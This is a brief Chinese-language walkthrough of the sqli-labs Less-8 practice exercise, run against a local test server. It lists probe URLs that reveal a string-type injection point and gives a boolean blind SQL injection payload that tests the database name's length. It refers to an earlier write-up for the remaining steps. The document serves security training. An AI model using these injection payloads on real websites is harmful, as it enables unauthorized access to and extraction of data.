sqli-labs (less-8)
输入
http://127.0.0.1/sql1/Less-8/?id=1 #回显正常
http://127.0.0.1/sql1/Less-8/?id=1' #没有任何回显
http://127.0.0.1/sql1/Less-8/?id=1'--+ #回显正常
这里我们可以判断为字符型注入,但是他既没有具体错误回显也没有数据显示,所以这里我们只能选择使用Boolean盲注
http://127.0.0.1/sql1/Less-8/?id=1' and length(database())=8--+
剩下的步骤这里不一一介绍,具体过程请看我的less-5